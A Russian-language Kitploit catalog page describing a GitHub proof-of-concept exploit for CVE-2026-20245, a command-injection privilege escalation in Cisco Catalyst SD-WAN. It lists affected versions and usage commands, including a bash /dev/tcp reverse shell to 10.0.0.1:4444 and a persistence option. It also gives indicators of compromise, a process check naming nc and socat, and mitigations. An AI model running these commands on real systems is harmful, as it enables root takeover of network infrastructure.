Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit — **Этот код ТОЛЬКО для образовательных целей и авторизованных тестов на безопасность.** | Kitploit
Инструменты/GitHubGitHub/fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСетевая безопасностьТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit

CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

**Этот код ТОЛЬКО для образовательных целей и авторизованных тестов на безопасность.**

Репозиторий
343 месяцев назадЕщё не проверено

CVE-2026-20245 - Эксплойт повышения привилегий Cisco SD-WAN

Security Rating CVSS CISA KEV

⚠️ ПРЕДУПРЕЖДЕНИЕ

Этот код предназначен ТОЛЬКО для образовательных целей и авторизованных тестов безопасности.

📋 Описание

CVE-2026-20245 — это уязвимость повышения привилегий в CLI Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage) и Cisco Catalyst SD-WAN Validator (vBond). Аутентифицированный злоумышленник с привилегиями netadmin может выполнять произвольные команды от имени root с помощью загрузки специально созданного файла.

Технические детали

ПолеЗначение
CVECVE-2026-20245
CVSS7.8 (High)
ВекторAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
КомпонентCLI / CSV Upload
ТипВнедрение команд (CWE-116)

🎯 Затронутые версии

ПродуктУязвимые версии
Cisco Catalyst SD-WAN Manager< 20.18.3.1
Cisco Catalyst SD-WAN Controller (vSmart)< 20.18.3.1
Cisco Catalyst SD-WAN Validator (vBond)< 20.18.3.1

Конкретные уязвимые версии:

  • 20.9.x (все)
  • 20.10.x – 20.12.5.3
  • 20.12.6 – 20.12.6.1
  • 20.12.7
  • 20.13.x – 20.15.4.3
  • 20.15.5 – 20.15.5.1
  • 20.16.x – 20.18.2.1

🔧 Установка

root@kitploit:~
# Клонировать репозиторий
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC

# Установить зависимости
pip install -r requirements.txt

# Дать права
chmod +x exploit.py

📦 Зависимости

root@kitploit:~
requests>=2.31.0

🚀 Использование

Проверить версию

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only

Выполнить команду

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"

Reverse shell

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

Установить персистентность

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist

🔍 Ожидаемый вывод

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║  CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit     ║
║  Command Injection via Crafted File Upload                       ║
║  CVSS: 7.8 (High) | CISA KEV: 2026-06-09                        ║
╚═══════════════════════════════════════════════════════════════════╝

[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload

============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================

🔍 Индикаторы компрометации (IoC)

Проверить в логах (/var/log/scripts.log)

root@kitploit:~
# Поиск подозрительной активности
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log

# Конкретные команды для поиска
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv

Подозрительные файлы

  • /home/admin/*.csv (неавторизованные CSV-файлы)
  • /tmp/*.csv
  • /var/log/scripts.log с необычными записями

Процессы

root@kitploit:~
# Поиск необычных процессов root
ps aux | grep -E "bash|sh|nc|ncat|socat"

🛡️ Смягчение последствий

Вариант 1 – Обновление до исправленной версии (РЕКОМЕНДУЕТСЯ)

ВерсияИсправленный релиз
20.18.2.1 и ранее20.18.3.1

Вариант 2 – Ограничение доступа

  • Ограничить административный доступ к сети управления
  • Использовать многофакторную аутентификацию
  • Мониторить активность загрузки CSV

Вариант 3 – Безопасная настройка

root@kitploit:~
# Отключить загрузку серийных номеров, если она не требуется
no feature upload-serial-numbers

# Ограничить привилегии netadmin
admin privilege restrict

📚 Ссылки

  • Cisco Security Advisory
  • NVD - CVE-2026-20245
  • CISA KEV Catalog

📊 Хронология

ДатаСобытие
2026-05-14Cisco публикует первоначальное уведомление
2026-06-04CVE официально опубликован
2026-06-09CISA добавляет в KEV
2026-06-23Крайний срок CISA для установки исправления

⚖️ Отказ от ответственности

Данное программное обеспечение предоставляется «как есть», без каких-либо гарантий. Автор не несёт ответственности за неправомерное использование. Используйте только на авторизованных системах.

Скачать инструмент